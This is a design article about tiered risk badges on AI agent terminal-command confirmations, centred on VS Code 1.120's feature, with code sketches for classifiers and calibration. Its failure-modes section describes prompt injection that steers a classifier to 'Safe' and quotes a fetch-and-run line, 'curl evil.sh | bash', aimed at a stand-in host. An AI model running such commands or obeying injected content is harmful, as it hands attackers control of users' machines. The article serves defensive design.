Pre-Execution Risk Classification for Terminal Commands

A tiered risk badge before a terminal command is an attention lever, not a gate; it tunes which confirmations get read, while allowlists enforce policy.

The problem risk badges address

Confirmation gates fail when every prompt looks identical. Reviewers pattern-match and approve without reading.

A tiered badge changes what each prompt costs to read. A green "Safe" chip on ls -la and a red "Review carefully" chip on git push --force origin main look different, so attention concentrates where it should. The badge does not gate the action. The allowlist, deny rule, or confirmation gate still does that. The badge only tunes which gates a human reads.

The VS Code 1.120 reference implementation

VS Code 1.120 (May 2026) ships this behind chat.tools.riskAssessment.enabled. From the release notes: "terminal command confirmations now include a risk badge with an AI-generated explanation of what the command does."

Tier	Color	Triggers
Safe	green	"reads files or prints output without making changes"
Caution	orange	"modifies the workspace, installs packages, or sends data over the network"
Review carefully	red	"performs an action that may be difficult or impossible to undo, such as force-pushing to a remote or deleting files outside the workspace"

Each badge ships with "a one-sentence summary tailored to the specific command" — that command-specific text is what makes the badge an attention lever.

graph TD
    A[Agent proposes command] --> B[Classifier reads resolved command + scope]
    B --> C{Risk tier}
    C -->|Safe| D[Green badge + summary]
    C -->|Caution| E[Orange badge + summary]
    C -->|Review carefully| F[Red badge + summary]
    D --> G[Confirmation gate]
    E --> G
    F --> G
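
The flow in the graph can be sketched as a small data model. This is a minimal illustration, not VS Code's internal types: `Tier`, `Badge`, `ConfirmationPrompt`, and `build_prompt` are hypothetical names. The point it shows is that the badge is attached to the prompt and every tier still reaches the confirmation gate.

```python
from dataclasses import dataclass
from enum import Enum


class Tier(Enum):
    # Values are the badge colors from the tier table above.
    SAFE = "green"
    CAUTION = "orange"
    REVIEW_CAREFULLY = "red"


@dataclass(frozen=True)
class Badge:
    tier: Tier
    summary: str  # one sentence, specific to this command


@dataclass(frozen=True)
class ConfirmationPrompt:
    command: str
    badge: Badge


def build_prompt(command: str, badge: Badge) -> ConfirmationPrompt:
    """Attach the badge to the prompt; no tier bypasses the gate (hypothetical helper)."""
    return ConfirmationPrompt(command=command, badge=badge)


prompt = build_prompt(
    "git push --force origin main",
    Badge(Tier.REVIEW_CAREFULLY, "Force-pushes to main and overwrites remote history."),
)
```

Keeping the tier as data on the prompt, rather than as a branch that skips the prompt, mirrors the advisory role described above.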

Design rules that separate signal from decoration

Use three tiers, no more. Two collapse to a binary prompt. Four or more blur the signal, so operators stop telling "Caution" from "Review carefully".

Write command-specific text, not boilerplate. "Review carefully — may be hard to undo" is generic. "Review carefully — force-pushes to main and overwrites remote history" gives the reader a fact they can act on.

Classify on resolved scope, not the raw string. rm -rf ./build/* in a /tmp sandbox and the same command from a repo root where ./build symlinks to / are the same string but wildly different actions: the shell expands the glob through the symlink, so rm receives the top-level directories of the filesystem. The Theia shell-execution proposal classifies on parsed structure (binary, flags, target paths), not the surface string.
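
One way to sketch scope resolution is to resolve each target path, following symlinks, and check whether it still lies inside the workspace. The helper names `resolve_targets` and `escapes_workspace` are hypothetical. The argument handling is a deliberate simplification (any argument not starting with `-` is treated as a path), and it is not the Theia proposal's parser.

```python
import os
import shlex
from pathlib import Path


def resolve_targets(command: str, cwd: str) -> list[Path]:
    """Resolve non-flag arguments against cwd, following symlinks."""
    argv = shlex.split(command)
    # Simplification (assumption): every argument after the binary that does
    # not start with "-" is treated as a target path.
    return [
        Path(os.path.realpath(os.path.join(cwd, arg)))
        for arg in argv[1:]
        if not arg.startswith("-")
    ]


def escapes_workspace(command: str, cwd: str, workspace: str) -> bool:
    """True if any resolved target lies outside the workspace root."""
    root = Path(os.path.realpath(workspace))
    return any(not t.is_relative_to(root) for t in resolve_targets(command, cwd))
```

Called with a command whose target sits under a `./build` that symlinks outside the workspace, `escapes_workspace` returns True; with a real `./build` directory it returns False. A production classifier would also need to handle globs, variables, and subshells, which this sketch ignores.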

Keep the badge advisory, not policy. Allowlists, deny rules, and PreToolUse hooks carry the security guarantee. VS Code's security docs note that auto-approval rules use "best-effort command parsing and have known limitations with shell aliases, quote concatenation, and complex shell syntax". A classifier built on the same parsing inherits the same limits, so organizations that need a hard floor disable auto-approval via ChatToolsTerminalEnableAutoApprove.

How badges layer with allowlists

Layer	Mechanism	Question it answers
Deny rules	Deterministic match	Can this command run at all?
Allowlist	Deterministic match	Can it run without asking?
Risk badge	Model-generated classification	If it asks, how hard should you read?
Confirmation gate	Human decision	Approve or reject?

Evidence-based allowlist auto-discovery promotes safe commands off the prompt path, and badges concentrate attention on the commands that remain. A badge on every command means the allowlist is under-tuned.
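
The ordering of the deterministic layers can be sketched as a routing function. This is an illustration under stated assumptions: `Outcome` and `route` are hypothetical names, and glob matching on the raw command string stands in for whatever matcher a real deny list or allowlist uses.

```python
from enum import Enum
from fnmatch import fnmatch


class Outcome(Enum):
    BLOCKED = "blocked"              # deny rule matched: cannot run at all
    AUTO_APPROVED = "auto-approved"  # allowlist matched: runs without asking
    NEEDS_CONFIRMATION = "ask"       # badge is shown, human decides


def route(command: str, deny: list[str], allow: list[str]) -> Outcome:
    """Apply the deterministic layers in order; deny wins over allow."""
    if any(fnmatch(command, pattern) for pattern in deny):
        return Outcome.BLOCKED
    if any(fnmatch(command, pattern) for pattern in allow):
        return Outcome.AUTO_APPROVED
    # Only commands that reach this point get a risk badge.
    return Outcome.NEEDS_CONFIRMATION


deny_rules = ["sudo *"]
allowlist = ["ls", "ls *", "git status"]
```

With these example rules, `ls -la` is auto-approved and never shows a badge, while `git push --force origin main` falls through to the confirmation gate, where the badge does its work.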

Calibrating the classifier against decisions

Join the gate decisions to the badge tier to surface miscalibration:

Safe with a non-trivial rejection rate means the classifier under-rates: the green chip masks commands humans read as dangerous.
Review-carefully approved in under N seconds, for a threshold N too short to read the summary, means the top tier is being rubber-stamped.
Caution with no rejections means over-tagging, or operators trained to ignore orange.
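
The three signals above can be computed from a decision log with a few lines of code. This sketch assumes a hypothetical log schema (`Decision` with a tier, an approval flag, and a time-to-decide), and the 3-second default for `fast_seconds` is an arbitrary stand-in for N, not a recommended value.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Decision:
    tier: str                 # "safe" | "caution" | "review" (assumed labels)
    approved: bool
    seconds_to_decide: float


def calibration_report(log: list[Decision], fast_seconds: float = 3.0) -> dict[str, float]:
    """Join gate decisions to badge tiers and compute the three signals."""
    by_tier: dict[str, list[Decision]] = defaultdict(list)
    for d in log:
        by_tier[d.tier].append(d)

    def rate(items, predicate) -> float:
        # Fraction of decisions in a tier matching the predicate; 0.0 if empty.
        return sum(1 for d in items if predicate(d)) / len(items) if items else 0.0

    return {
        "safe_rejection_rate": rate(by_tier["safe"], lambda d: not d.approved),
        "review_fast_approval_rate": rate(
            by_tier["review"],
            lambda d: d.approved and d.seconds_to_decide < fast_seconds,
        ),
        "caution_rejection_rate": rate(by_tier["caution"], lambda d: not d.approved),
    }
```

A rising `safe_rejection_rate` or `review_fast_approval_rate`, or a `caution_rejection_rate` stuck at zero, corresponds to the three miscalibration cases listed above.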

When this backfires

Adversarial inputs can steer the badge. The Lies-in-the-Loop attack class (Checkmarx Zero writeup) uses injected content to manipulate the safety dialog. A classifier driven by the same model under injection is in scope: a malicious README that steers the agent toward curl evil.sh | bash can also steer the classifier to "Safe — lists files." To mitigate, generate the classification from a separate isolated model, or compute the tier deterministically from parsed structure.

Color-only signals fail in high-volume sessions. With dozens of green confirmations, attention collapses on the color axis before the reader reaches the summary text. Pair the visual signal with a textual cue ([SAFE] / [CAUTION] / [REVIEW] prefix) to put discriminative load on the word.
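
A textual cue is cheap to add. The sketch below assumes hypothetical tier labels and a hypothetical `badge_line` helper; it only shows the prefix being carried in the text itself so the tier survives without color.

```python
# Mapping from an assumed internal tier label to the textual prefix.
PREFIX = {"safe": "[SAFE]", "caution": "[CAUTION]", "review": "[REVIEW]"}


def badge_line(tier: str, summary: str) -> str:
    """Render the badge as text so the tier is readable without color."""
    return f"{PREFIX[tier]} {summary}"
```

For example, `badge_line("review", "Force-pushes to main and overwrites remote history.")` yields a line that starts with `[REVIEW]`, which also reads correctly in logs and screen readers.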

Fixed-appearance tiers still habituate. Anderson et al.'s fMRI study, How Polymorphic Warnings Reduce Habituation in the Brain (CHI 2015), found that the visual-processing response to a static warning drops sharply by the second exposure, and that polymorphic warnings — ones that vary their appearance across exposures — resist that decay far better. A green "Safe" chip rendered identically across hundreds of commands is that static case: tiering separates Safe from Review-carefully, but the repeated within-tier chip still fades. Tiers reallocate attention across severity levels. They do not defeat the repetition habituation that motivated polymorphic designs and batched surfaces like the tool confirmation carousel.

Fatigue migrates rather than dissolves. If every command arrives with "Caution" — common in agents that install packages routinely — operators learn to ignore orange the same way they ignored the prompt. On its own, classification shifts where attention collapses, not whether it collapses.

Key Takeaways

A three-tier badge (Safe / Caution / Review carefully) restores discriminative attention that uniform prompts collapse.
VS Code 1.120 ships this behind chat.tools.riskAssessment.enabled, with documented trigger criteria for each tier: read-only, workspace-or-network, hard-to-undo.
Badge text must be command-specific; generic tier-level warnings get ignored the same way uniform prompts do.
Classify on the resolved command (binary, flags, target paths), not a regex over the raw string: the same string with a different blast radius is the dominant source of false-safe ratings.
Badges are advisory; deny rules and allowlists carry the security guarantee.
Calibrate against the gate-decision log — Safe rejections, Review-carefully fast-approvals, and zero-rejection Cautions all signal classifier drift.
The classifier inherits the agent's attack surface when generated by the same model; isolate it or compute deterministic tiers where possible.